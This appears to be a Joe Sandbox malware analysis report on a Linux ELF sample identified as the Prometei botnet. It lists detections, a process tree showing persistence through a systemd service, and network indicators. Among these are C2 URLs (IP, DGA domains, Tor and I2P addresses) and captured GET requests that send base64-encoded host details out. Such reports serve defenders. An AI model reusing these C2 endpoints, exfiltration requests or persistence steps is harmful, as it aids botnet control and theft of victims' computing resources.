Create Interactive Tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:	na.elf
Analysis ID:	1652682
MD5:	2bc8e60ab00c639da1f3c93f8843e04e
SHA1:	892aeeaaf1770f391b694088cf70d2e20bef1caa
SHA256:	1af93251f5622164252f068bf56ac2b86e5056973c33c9a4ba3fd69f41850935
Tags:	elfuser-abuse_ch
Infos:

Detection

Prometei

Score:	100
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Prometei

Drops files in suspicious directories

Found Tor onion address

Sample deletes itself

Sample is packed with UPX

Creates hidden files and/or directories

ELF contains segments with high entropy indicating compressed/encrypted content

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "pgrep" command search for and/or send signals to processes

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

Executes the "uname" command used to read OS and architecture name

HTTP GET or POST without a user agent

Reads CPU information from /proc indicative of miner or evasive malware

Reads CPU information from /sys indicative of miner or evasive malware

Reads system information from the proc file system

Sample listens on a socket

Sample tries to set the executable flag

Suricata IDS alerts with low severity for network traffic

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Yara signature match

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1652682
Start date and time:	2025-03-31 11:37:15 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	na.elf
Detection:	MAL
Classification:	mal100.troj.evad.linELF@0/13@5/0

Warnings

VT rate limit hit for: http://152.36.128.18/cgi-bin/p.cgi?r=16&i=HG6TD1RQ3I303VPA
VT rate limit hit for: http://xinchaodbcfda.net/cgi-bin/p.cgi?r=0&auth=hash&i=HG6TD1RQ3I303VPA&enckey=vMZ4j7wVt0TOGgrBVyLGT-o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM_
VT rate limit hit for: http://xindbcfda.org/cgi-bin/p.cgi?r=0&auth=hash&i=HG6TD1RQ3I303VPA&enckey=vMZ4j7wVt0TOGgrBVyLGT-o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM_

Runtime Messages

Command:	/tmp/na.elf
PID:	5454
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Starting... System install...OK
Standard Error:	Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.

Process Tree

system is lnxubuntu20

na.elf (PID: 5454, Parent: 5381, MD5: 2bc8e60ab00c639da1f3c93f8843e04e) Arguments: /tmp/na.elf

na.elf New Fork (PID: 5457, Parent: 5454)

sh (PID: 5457, Parent: 5454, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep na.elf"

sh New Fork (PID: 5458, Parent: 5457)

pgrep (PID: 5458, Parent: 5457, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep na.elf

na.elf New Fork (PID: 5463, Parent: 5454)

sh (PID: 5463, Parent: 5454, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof na.elf"

sh New Fork (PID: 5464, Parent: 5463)

pidof (PID: 5464, Parent: 5463, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof na.elf

na.elf New Fork (PID: 5467, Parent: 5454)

sh (PID: 5467, Parent: 5454, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"

sh New Fork (PID: 5468, Parent: 5467)

pgrep (PID: 5468, Parent: 5467, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay

na.elf New Fork (PID: 5471, Parent: 5454)

sh (PID: 5471, Parent: 5454, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"

sh New Fork (PID: 5472, Parent: 5471)

pgrep (PID: 5472, Parent: 5471, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup

na.elf New Fork (PID: 5477, Parent: 5454)

sh (PID: 5477, Parent: 5454, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"

sh New Fork (PID: 5489, Parent: 5477)

pidof (PID: 5489, Parent: 5477, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup

na.elf New Fork (PID: 5504, Parent: 5454)

sh (PID: 5504, Parent: 5454, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"

sh New Fork (PID: 5505, Parent: 5504)

systemctl (PID: 5505, Parent: 5504, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

na.elf New Fork (PID: 5513, Parent: 5454)

sh (PID: 5513, Parent: 5454, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"

sh New Fork (PID: 5514, Parent: 5513)

systemctl (PID: 5514, Parent: 5513, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service

na.elf New Fork (PID: 5519, Parent: 5454)

sh (PID: 5519, Parent: 5454, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"

sh New Fork (PID: 5520, Parent: 5519)

systemctl (PID: 5520, Parent: 5519, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service

fwupd New Fork (PID: 5481, Parent: 1)

gpgconf (PID: 5481, Parent: 1, MD5: ddc6865fed36b9020dfd6fe9d360ebbb) Arguments: /usr/bin/gpgconf --list-dirs

fwupd New Fork (PID: 5491, Parent: 1)

gpgconf (PID: 5491, Parent: 1, MD5: ddc6865fed36b9020dfd6fe9d360ebbb) Arguments: /usr/bin/gpgconf --list-components

fwupd New Fork (PID: 5493, Parent: 1)

gpg (PID: 5493, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: /usr/bin/gpg --version

fwupd New Fork (PID: 5495, Parent: 1)

gpgsm (PID: 5495, Parent: 1, MD5: 66be603a7085efc7ee3140d2ff597485) Arguments: /usr/bin/gpgsm --version

fwupd New Fork (PID: 5497, Parent: 1)

gpgconf (PID: 5497, Parent: 1, MD5: ddc6865fed36b9020dfd6fe9d360ebbb) Arguments: /usr/bin/gpgconf --version

fwupd New Fork (PID: 5499, Parent: 1)

gpg (PID: 5499, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: /usr/bin/gpg --version

fwupd New Fork (PID: 5501, Parent: 1)

gpg (PID: 5501, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27

fwupd New Fork (PID: 5503, Parent: 1)

gpg (PID: 5503, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27

fwupd New Fork (PID: 5509, Parent: 1)

gpg (PID: 5509, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28

systemd New Fork (PID: 5511, Parent: 5510)

snapd-env-generator (PID: 5511, Parent: 5510, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5517, Parent: 5516)

snapd-env-generator (PID: 5517, Parent: 5516, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

fwupd New Fork (PID: 5522, Parent: 1)

gpg (PID: 5522, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28

systemd New Fork (PID: 5523, Parent: 1)

uplugplay (PID: 5523, Parent: 1, MD5: 2bc8e60ab00c639da1f3c93f8843e04e) Arguments: /usr/sbin/uplugplay

uplugplay New Fork (PID: 5533, Parent: 5523)

uplugplay New Fork (PID: 5534, Parent: 5533)

sh (PID: 5534, Parent: 5533, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"

sh New Fork (PID: 5535, Parent: 5534)

uplugplay (PID: 5535, Parent: 5534, MD5: 2bc8e60ab00c639da1f3c93f8843e04e) Arguments: /usr/sbin/uplugplay -Dcomsvc

uplugplay New Fork (PID: 5539, Parent: 5535)

sh (PID: 5539, Parent: 5535, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl

sh New Fork (PID: 5540, Parent: 5539)

hostnamectl (PID: 5540, Parent: 5539, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl

uplugplay New Fork (PID: 5553, Parent: 5535)

sh (PID: 5553, Parent: 5535, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl

sh New Fork (PID: 5554, Parent: 5553)

hostnamectl (PID: 5554, Parent: 5553, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl

uplugplay New Fork (PID: 5690, Parent: 5535)

sh (PID: 5690, Parent: 5535, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime

sh New Fork (PID: 5694, Parent: 5690)

uptime (PID: 5694, Parent: 5690, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime

uplugplay New Fork (PID: 5693, Parent: 5535)

sh (PID: 5693, Parent: 5535, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime

sh New Fork (PID: 5695, Parent: 5693)

uptime (PID: 5695, Parent: 5693, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime

uplugplay New Fork (PID: 5698, Parent: 5535)

sh (PID: 5698, Parent: 5535, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"

sh New Fork (PID: 5699, Parent: 5698)

uname (PID: 5699, Parent: 5698, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a

uplugplay New Fork (PID: 5702, Parent: 5535)

sh (PID: 5702, Parent: 5535, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"

sh New Fork (PID: 5703, Parent: 5702)

uname (PID: 5703, Parent: 5702, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a

systemd New Fork (PID: 5555, Parent: 1)

systemd-hostnamed (PID: 5555, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed

dash New Fork (PID: 5779, Parent: 3636)

rm (PID: 5779, Parent: 3636, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.qGJ3bwLjXY /tmp/tmp.1CaqzfB7yS /tmp/tmp.LOsFLDTnx1

dash New Fork (PID: 5780, Parent: 3636)

rm (PID: 5780, Parent: 3636, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.qGJ3bwLjXY /tmp/tmp.1CaqzfB7yS /tmp/tmp.LOsFLDTnx1

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Prometei		No Attribution	https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html https://cujo.com/iot-malware-journals-prometei-linux/ https://twitter.com/IntezerLabs/status/1338480158249013250 https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
na.elf	Linux_Trojan_Dofloo_ac3333d1	unknown	unknown	0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45

Dropped Files

Source	Rule	Description	Author	Strings
/usr/sbin/uplugplay	Linux_Trojan_Dofloo_ac3333d1	unknown	unknown	0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45

Memory Dumps

Source	Rule	Description	Author	Strings
5454.1.0000000000401000.00000000004f9000.r-x.sdmp	Linux_Hacktool_Flooder_1a4eb229	unknown	unknown	0x9beb:$a: F4 8B 45 E8 83 C0 01 89 45 F8 EB 0F 8B 45 E8 83 C0 01 89 45 F4 8B
5454.1.0000000000401000.00000000004f9000.r-x.sdmp	Linux_Hacktool_Flooder_f454ec10	unknown	unknown	0xb569:$a: 8B 45 EC 48 63 D0 48 8B 45 D0 48 01 D0 0F B6 00 3C 2E 75 4D 8B
5454.1.000000000052d000.0000000001575000.rw-.sdmp	Linux_Trojan_Dofloo_ac3333d1	unknown	unknown	0x7190db:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
Process Memory Space: na.elf PID: 5454	JoeSecurity_Prometei	Yara detected Prometei	Joe Security

Suricata Signatures

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-31T11:40:23.906965+0200	2018141	1	A Network Trojan was detected	52.26.80.133	80	192.168.2.14	46510	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-31T11:40:23.906965+0200	2037771	1	A Network Trojan was detected	52.26.80.133	80	192.168.2.14	46510	TCP

ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-31T11:40:22.887934+0200	2044560	1	A Network Trojan was detected	192.168.2.14	36645	8.8.8.8	53	UDP
2025-03-31T11:40:22.987843+0200	2044560	1	A Network Trojan was detected	192.168.2.14	44448	8.8.8.8	53	UDP
2025-03-31T11:40:23.095566+0200	2044560	1	A Network Trojan was detected	192.168.2.14	36531	8.8.8.8	53	UDP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-31T11:38:18.228892+0200	2803305	3	Unknown Traffic	192.168.2.14	40758	152.36.128.18	80	TCP
2025-03-31T11:38:21.446191+0200	2803305	3	Unknown Traffic	192.168.2.14	40760	152.36.128.18	80	TCP
2025-03-31T11:40:23.675648+0200	2803305	3	Unknown Traffic	192.168.2.14	46510	52.26.80.133	80	TCP
2025-03-31T11:40:24.690086+0200	2803305	3	Unknown Traffic	192.168.2.14	44132	85.214.228.140	80	TCP

Joe Sandbox Signatures

• AV Detection
• Bitcoin Miner
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Stealing of Sensitive Information

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: na.elf

Avira: detected

Antivirus detection for dropped file

Source: /usr/sbin/uplugplay

Avira: detection malicious, Label: LINUX/GM.Agent.JQ

Multi AV Scanner detection for submitted file

Source: na.elf

ReversingLabs: Detection: 47%

Bitcoin Miner

Yara detected Prometei

Source: Yara match

File source: Process Memory Space: na.elf PID: 5454, type: MEMORYSTR

Source: /usr/sbin/uplugplay (PID: 5535)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: /usr/bin/pgrep (PID: 5458)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 5468)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5535)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 5694)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 5695)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044560 - Severity 1 - ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern : 192.168.2.14:44448 -> 8.8.8.8:53
Source: Network traffic	Suricata IDS: 2044560 - Severity 1 - ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern : 192.168.2.14:36645 -> 8.8.8.8:53
Source: Network traffic	Suricata IDS: 2044560 - Severity 1 - ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern : 192.168.2.14:36531 -> 8.8.8.8:53

Found Tor onion address

Source: na.elf, 5454.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: na.elf, 5454.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: nNhttp://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug

Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=16&i=HG6TD1RQ3I303VPA HTTP/1.0Host: 152.36.128.18
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSANCg0KL3Vzci9zYmluLw0KIDA0OjM4OjIwIHVwIDIgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiA2LjM0LCAyLjQ1LCAwLjg5fDE3NDM0MTM5MDANCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=HG6TD1RQ3I303VPA&h=galassia&enckey=vMZ4j7wVt0TOGgrBVyLGT+o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM= HTTP/1.0Host: 152.36.128.18
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=0&auth=hash&i=HG6TD1RQ3I303VPA&enckey=vMZ4j7wVt0TOGgrBVyLGT-o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM_ HTTP/1.0Host: xinchaodbcfda.net
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=0&auth=hash&i=HG6TD1RQ3I303VPA&enckey=vMZ4j7wVt0TOGgrBVyLGT-o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM_ HTTP/1.0Host: xindbcfda.org

Source: /usr/sbin/uplugplay (PID: 5535)

Socket: 0.0.0.0:89

Jump to behavior

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.14:44132 -> 85.214.228.140:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.14:46510 -> 52.26.80.133:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.14:40760 -> 152.36.128.18:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.26.80.133:80 -> 192.168.2.14:46510
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.14:40758 -> 152.36.128.18:80
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.26.80.133:80 -> 192.168.2.14:46510

Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49

Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=16&i=HG6TD1RQ3I303VPA HTTP/1.0Host: 152.36.128.18
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSANCg0KL3Vzci9zYmluLw0KIDA0OjM4OjIwIHVwIDIgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiA2LjM0LCAyLjQ1LCAwLjg5fDE3NDM0MTM5MDANCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=HG6TD1RQ3I303VPA&h=galassia&enckey=vMZ4j7wVt0TOGgrBVyLGT+o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM= HTTP/1.0Host: 152.36.128.18
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=0&auth=hash&i=HG6TD1RQ3I303VPA&enckey=vMZ4j7wVt0TOGgrBVyLGT-o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM_ HTTP/1.0Host: xinchaodbcfda.net
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=0&auth=hash&i=HG6TD1RQ3I303VPA&enckey=vMZ4j7wVt0TOGgrBVyLGT-o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM_ HTTP/1.0Host: xindbcfda.org

Source: global traffic	DNS traffic detected: DNS query: xinchaodbcfda.com
Source: global traffic	DNS traffic detected: DNS query: xinchaodbcfda.net
Source: global traffic	DNS traffic detected: DNS query: xindbcfda.org

Source: na.elf, uplugplay.12.dr	String found in binary or memory: http://152.36.128
Source: na.elf, 5454.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://152.36.128.18/cgi-bin/p.cgi
Source: na.elf, 5454.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni
Source: na.elf, 5454.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
Source: na.elf, 5454.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Source: na.elf, uplugplay.12.dr	String found in binary or memory: http://upx.sf.net
Source: na.elf, 5454.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi

Source: unknown	Network traffic detected: HTTP traffic on port 43384 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59334 -> 443
